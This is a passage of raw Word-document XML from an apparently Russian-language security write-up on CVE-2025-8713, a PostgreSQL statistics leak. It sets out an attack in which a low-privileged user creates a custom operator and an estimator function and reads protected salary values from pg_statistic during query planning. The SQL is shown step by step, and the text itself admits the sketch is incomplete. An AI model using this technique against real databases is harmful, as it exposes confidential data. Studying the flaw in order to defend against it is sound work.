    <w:p w14:paraId="78C8C598" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    employee_id int PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49516336" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    department text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5257E65C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    annual_salary numeric NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D25CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0FDCCD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57966835" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ACL: только HR имеет SELECT на annual_salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40289AE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT SELECT (employee_id, department) ON app.salaries TO public;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CAC3F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT SELECT (annual_salary) ON app.salaries TO hr_role;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCBC759" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAB703A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ИЛИ RLS-эквивалент:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FD6B8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER TABLE app.salaries ENABLE ROW LEVEL SECURITY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79135A61" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CREATE POLICY only_own ON app.salaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767F45DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (employee_id = current_setting('app.employee_id')::int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA7BDE6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2CE437" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Атакующий имеет access как обычный пользователь:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BECA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- - SELECT (employee_id, department), но не SELECT (annual_salary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF24789" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- - ИЛИ может прочитать только свои rows через RLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AF4BA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для CVE-2025-8713 атакующий также нуждается в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CREATE на schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для CREATE OPERATOR/CREATE FUNCTION), что в PG 15+ для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> schema по умолчанию REVOKE-нут, но для tenant-schemas обычно дан.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F538CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — extraction most_common_vals через custom operator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1590FE18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий создаёт estimator function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7670AEAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Атакующий создаёт функцию-приёмник, которая получает stats и логирует</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE9A8B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION attacker.peek_stats(internal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF96EBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS internal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5519F35E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE C STRICT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9A4B84" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS '$libdir/postgres', 'restriction_selectivity';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4FF626" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ В реальной CVE-2025-8713 эксплуатации используется custom estimator,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA2D88F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- но C-language требует superuser. Для realistic exploit на user-роль</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655ACE19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- используется plpgsql-обёртка над встроенными estimator-functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A1815A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- или другой механизм доступа к pg_statistic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EC4598" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>В реальной CVE-2025-8713 эксплуатации path сложнее — требует комбинации custom operator с estimator который leaks данные через side-channel (timing или error messages). GBHackers article (R26 source) описывает high-level vector без full PoC, который в open-disclosure не опубликован.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3836A146" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий создаёт custom operator на target column:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D5D818" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Custom operator на колонку annual_salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CFC626" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OPERATOR @@@ (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF14079" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    LEFTARG = numeric,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43434A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RIGHTARG = numeric,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E795151" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FUNCTION = attacker.peek_stats,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F314566" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RESTRICT = attacker.leaky_estimator,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00404402" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    JOIN = attacker.leaky_estimator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7DAE0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8B4B2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий выполняет query с этим operator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF910E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- В WHERE использовать @@@ против target колонки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FC9729" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT count(*) FROM app.salaries WHERE annual_salary @@@ 100000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FC7E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>При planning этой query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E4B1C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. PostgreSQL вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>leaky_estimator(annual_salary)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для оценки selectivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5183DB81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>leaky_estimator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через optimizer-API получает доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pg_statistic entries для колонки annual_salary</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A88CC03" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>most_common_vals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для этой колонки содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>actual salary values</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий читает их.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D077B5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Финальный execute query применяет ACL/RLS и возвращает 0 rows (атакующий не видит salary). Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>статистики уже leaked в planning phase</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23146452" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (planning trace):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605966D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- planning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB4A21" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--   Custom operator @@@(numeric, numeric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E7AFC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--   restriction selectivity → attacker.leaky_estimator(...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F2C53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>--   ↑ читает pg_statistic for app.salaries.annual_salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58644D7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
